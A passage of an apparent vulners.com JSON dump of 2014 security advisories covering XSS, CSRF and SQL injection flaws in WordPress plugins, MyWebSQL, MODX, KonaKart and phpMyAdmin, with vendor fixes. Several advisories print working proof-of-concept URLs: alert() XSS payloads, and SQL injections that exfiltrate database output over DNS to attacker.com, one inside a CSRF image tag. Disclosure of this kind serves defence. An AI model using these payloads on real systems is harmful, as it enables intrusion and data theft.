AJAX RadEditor Control", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-7139"], "description": "\r\n\r\nAdvisory ID: HTB23233\r\nProduct: Contact Form DB WordPress plugin\r\nVendor: Michael Simpson\r\nVulnerable Version(s): 2.8.13 and probably prior\r\nTested Version: 2.8.13\r\nAdvisory Publication: September 17, 2014 [without technical details]\r\nVendor Notification: September 17, 2014 \r\nVendor Patch: September 25, 2014 \r\nPublic Disclosure: October 8, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-7139\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Contact Form DB WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin installed.\r\n\r\n1) Two Cross-Site Scripting (XSS) Vulnerabilities in Contact Form DB WordPress Plugin: CVE-2014-7139\r\n\r\n1.1 Input passed via the "form" HTTP GET parameter to "/wp-admin/admin.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&form=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n1.2 Input passed via the "enc" HTTP GET parameter to "/wp-admin/admin.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&enc=%27%22%29;%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Contact Form DB 2.8.16.\r\n\r\nMore Information:\r\nhttps://wordpress.org/plugins/contact-form-7-to-database-extension/changelog/\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23233 - https://www.htbridge.com/advisory/HTB23233 - Tow XSS in Contact Form DB WordPress Plugin.\r\n[2] Contact Form DB WordPress plugin - http://wordpress.org/plugins/contact-form-7-to-database-extension/ - Save form submissions to the database from Contact Form 7, Fast Secure Contact Form, JetPack Contact Form and Gravity Forms. Includes exports and short codes.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31165", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31165", "title": "Two XSS in Contact Form DB WordPress plugin", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-6315"], "description": "\r\n\r\nAdvisory ID: HTB23232\r\nProduct: Photo Gallery WordPress plugin\r\nVendor: http://web-dorado.com/\r\nVulnerable Version(s): 1.1.30 and probably prior\r\nTested Version: 1.1.30\r\nAdvisory Publication: September 10, 2014 [without technical details]\r\nVendor Notification: September 10, 2014 \r\nVendor Patch: September 10, 2014 \r\nPublic Disclosure: October 1, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-6315\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered three vulnerabilities in Photo Gallery WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin: CVE-2014-6315\r\n\r\n1.1 Input passed via the "callback" HTTP GET parameter to "/wp-admin/admin-ajax.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&callback=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n1.2 Input passed via the "dir" HTTP GET parameter to "/wp-admin/admin-ajax.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&dir=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n1.3 Input passed via the "extensions" HTTP GET parameter to "/wp-admin/admin-ajax.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Photo Gallery 1.1.31\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23232 - https://www.htbridge.com/advisory/HTB23232 - Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin.\r\n[2] Photo Gallery WordPress plugin - http://web-dorado.com/ - This plugin is a fully responsive gallery plugin with advanced functionality. It allows having different image galleries for your posts and pages. You can create unlimited number of galleries, combine them into albums, and provide descriptions and tags.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31167", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31167", "title": "Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:183\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : phpmyadmin\r\n Date : September 24, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Updated phpmyadmin package fixes security vulnerability:\r\n \r\n In phpMyAdmin before 4.2.9, by deceiving a logged-in user to click on\r\n a crafted URL, it is possible to perform remote code execution and in\r\n some cases, create a root account due to a DOM based XSS vulnerability\r\n in the micro history feature (CVE-2014-6300).\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6300\r\n http://advisories.mageia.org/MGASA-2014-0383.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 081d40d2fc64105bc0d4d6dd93b33ea2 mbs1/x86_64/phpmyadmin-4.2.9-1.mbs1.noarch.rpm \r\n 9a937ee1396303d33c4dc05371761e69 mbs1/SRPMS/phpmyadmin-4.2.9-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFUIs9VmqjQ0CJFipgRAjl/AJwPlBVdaeOMbA/8P08dKR2WT69MTgCg4NFP\r\nuxJfyBb76CCC2gErawkQAhQ=\r\n=URql\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "[ MDVSA-2014:183 ] phpmyadmin", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31184", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31184", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-5516"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nCVE-2014-5516\r\n===================\r\n"Cross-Site Request Forgery (CSRF) protection bypass" (CWE-352) vulnerability \r\nin "KonaKart Storefront Application" Enterprise Java eCommerce product\r\n\r\n\r\nVendor\r\n===================\r\nDS Data Systems (UK) Ltd.\r\n\r\n\r\nProduct\r\n===================\r\n"KonaKart is an affordable java based shopping cart software solution for online retailers. \r\nLet KonaKart help increase your eCommerce sales."\r\n - source: http://www.konakart.com\r\n\r\n"KonaKart is a Java eCommerce system aimed at medium to large online retailers."\r\n - source: https://en.wikipedia.org/wiki/KonaKart\r\n\r\n\r\nAffected versions\r\n===================\r\nThis vulnerability affects versions of KonaKart Storefront Application prior to 7.3.0.0\r\n\r\n\r\nPatch\r\n===================\r\nThe vendor has released a XSRF fix as part of version 7.3.0.0 at\r\nhttp://www.konakart.com/downloads/ver-7-3-0-0-whats-new\r\n\r\n\r\nReported by\r\n===================\r\nThis issue was reported to the vendor by Christian Schneider (@cschneider4711) \r\nfollowing a responsible disclosure process.\r\n\r\n\r\nSeverity\r\n===================\r\nMedium\r\n\r\n\r\nDescription\r\n===================\r\nThe existing CSRF protection token was checked for every POST request\r\nproperly. When modifying the request from POST method to GET method \r\nall state-changing actions worked as well, but the CSRF token protection \r\nwas no longer enforced, allowing CSRF attacks.\r\n\r\n\r\nEscalation potential\r\n====================\r\nExploitation demonstration was responsibly provided along with the vulnerability \r\nreport to the vendor, which changed a victim's mail address (using the CSRF \r\nprotection bypass) to an attacker-supplied mail address, allowing a successful \r\nreset of victim's account password by the attacker.\r\n\r\n\r\nTimeline\r\n===================\r\n2014-05-02 Vulnerability discovered\r\n2014-05-02 Vulnerability responsibly reported to vendor\r\n2014-05-02 Reply from vendor acknowledging report\r\n2014-??-?? Vendor released patch as part of version 7.3.0.0\r\n2014-09-20 Advisory published via BugTraq\r\n\r\n\r\nReferences\r\n===================\r\nhttp://www.konakart.com/downloads/ver-7-3-0-0-whats-new\r\nhttp://www.christian-schneider.net/advisories/CVE-2014-5516.txt\r\n\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (Darwin)\r\n\r\niEYEARECAAYFAlQd69cACgkQXYAsOfddvFOTVACgr/f5+x5kf60t5LaCqhH0pvSY\r\nQYoAnjiI0WSa3iGuw/OfXk3/vLV+liFm\r\n=61mn\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31211", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31211", "title": "CVE-2014-5516 CSRF protection bypass in "KonaKart" Java eCommerce product", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-4735"], "description": "\r\n\r\nAdvisory ID: HTB23221\r\nProduct: MyWebSQL\r\nVendor: http://mywebsql.net/\r\nVulnerable Version(s): 3.4 and probably prior\r\nTested Version: 3.4\r\nAdvisory Publication: June 25, 2014 [without technical details]\r\nVendor Notification: June 25, 2014 \r\nPublic Disclosure: September 3, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-4735\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in MyWebSQL, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in MyWebSQL: CVE-2014-4735\r\n\r\nThe vulnerability is caused by insufficient sanitization of the "table" HTTP GET parameter passed to "/index.php" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of vulnerable website. Further exploitation of this vulnerability may grant an attacker full access to the website's databases and get complete control over it.\r\n\r\nThe following exploitation example uses the alert() JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/?q=wrkfrm&type=exporttbl&table=%27;%3C/script%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nDisclosure timeline:\r\n2014-06-25 Vendor alerted via emails and contact form.\r\n2014-07-03 Vendor alerted via emails, contact form and twitter.\r\n2014-07-03 Vendor replied that he received information.\r\n2014-07-10 Fix requested.\r\n2014-07-10 Vendor requested to move public disclosure date to August 30.\r\n2014-08-27 Fix requested.\r\n2014-08-27 Vendor didn't release any patch and agreed to disclose on August 30 without patch.\r\n2014-08-27 Disclosure date moved to September 3.\r\n2014-09-01 Fix requested.\r\n2014-09-03 Public disclosure, patch by HTB Research is available.\r\n\r\nCurrently we are not aware of any official solution for this vulnerability.\r\nUnofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23221-patch.zip\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23221 - https://www.htbridge.com/advisory/HTB23221 - Cross-Site Scripting (XSS) in MyWebSQL.\r\n[2] MyWebSQL - http://mywebsql.net/ - MyWebSQL is the ultimate desktop replacement for managing your MySQL databases over the web.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31192", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31192", "title": "Reflected Cross-Site Scripting (XSS) in MyWebSQL", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:194\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : phpmyadmin\r\n Date : October 3, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A vulnerability has been discovered and corrected in phpmyadmin:\r\n \r\n With a crafted ENUM value it is possible to trigger an XSS in table\r\n search and table structure pages (CVE-2014-7217).\r\n \r\n This upgrade provides the latest phpmyadmin version (4.2.9.1) to\r\n address this vulnerability.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7217\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-11.php\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n ff0e5b44787e03e9d09d9c9200cecd3a mbs1/x86_64/phpmyadmin-4.2.9.1-1.mbs1.noarch.rpm \r\n f9075edf1b5a66acdaccc1bf0574c3f6 mbs1/SRPMS/phpmyadmin-4.2.9.1-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFULlltmqjQ0CJFipgRAsD7AJwMmbkAyyQJtGHrUMUqM0kaXaarvgCfck+W\r\nGisKIxQdggHou8U1F8JP2xY=\r\n=t4Ln\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "[ MDVSA-2014:194 ] phpmyadmin", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31185", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31185", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-6242"], "description": "\r\n\r\nAdvisory ID: HTB23231\r\nProduct: All In One WP Security WordPress plugin\r\nVendor: Tips and Tricks HQ, Peter, Ruhul, Ivy \r\nVulnerable Version(s): 3.8.2 and probably prior\r\nTested Version: 3.8.2\r\nAdvisory Publication: September 3, 2014 [without technical details]\r\nVendor Notification: September 3, 2014 \r\nVendor Patch: September 12, 2014 \r\nPublic Disclosure: September 24, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-6242\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. \r\n\r\n\r\n1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242\r\n\r\n1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "orderby" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.:\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\n\r\n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.:\r\n\r\n<img src="http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29">\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to All In One WP Security 3.8.3\r\n\r\nMore Information:\r\nhttps://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin.\r\n[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31168", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31168", "title": "Two SQL Injections in All In One WP Security WordPress plugin", "type": "securityvulns", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-5451"], "description": "\r\n\r\nAdvisory ID: HTB23229\r\nProduct: MODX Revolution\r\nVendor: MODX\r\nVulnerable Version(s): 2.3.1-pl and probably prior\r\nTested Version: 2.3.1-pl\r\nAdvisory Publication: August 20, 2014 [without technical details]\r\nVendor Notification: August 20, 2014 \r\nVendor Patch: September 11, 2014 \r\nPublic Disclosure: September 17, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-5451\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in MODX Revolution, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in MODX Revolution: CVE-2014-5451\r\n\r\nThe vulnerability exists due to insufficient sanitization of input data passed via the "a" HTTP GET parameter to "/manager/" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\nThis vulnerability can be used against website administrator to perform phishing attacks, steal potentially sensitive data and gain complete control over web application.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" 